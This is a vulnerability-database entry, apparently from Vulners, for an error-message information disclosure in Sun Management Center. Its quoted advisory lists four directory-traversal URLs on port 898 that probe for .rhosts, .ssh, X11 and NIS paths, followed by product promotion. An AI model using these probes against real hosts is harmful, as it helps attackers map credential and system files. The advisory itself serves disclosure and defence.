Lucene search
K

Sun Management Center 3.03.5 - Error Message Information Disclosure

🗓️ 22 Oct 2003 00:00:00Reported by Jon HartType 
exploitpack
 exploitpack
👁 8 Views

Sensitive information may be disclosed through error messages in Sun Management Center.

Code
source: https://www.securityfocus.com/bid/8873/info

A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts. 

http://www.example.com:898/../../../../../tmp/.X11-unix
http://www.example.com:898/../../../../../.rhosts
http://www.example.com:898/../../../../../.ssh
http://www.example.com:898/../../../../../var/yp

These examples were return different error messages based on whether the requested resource exists or not.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation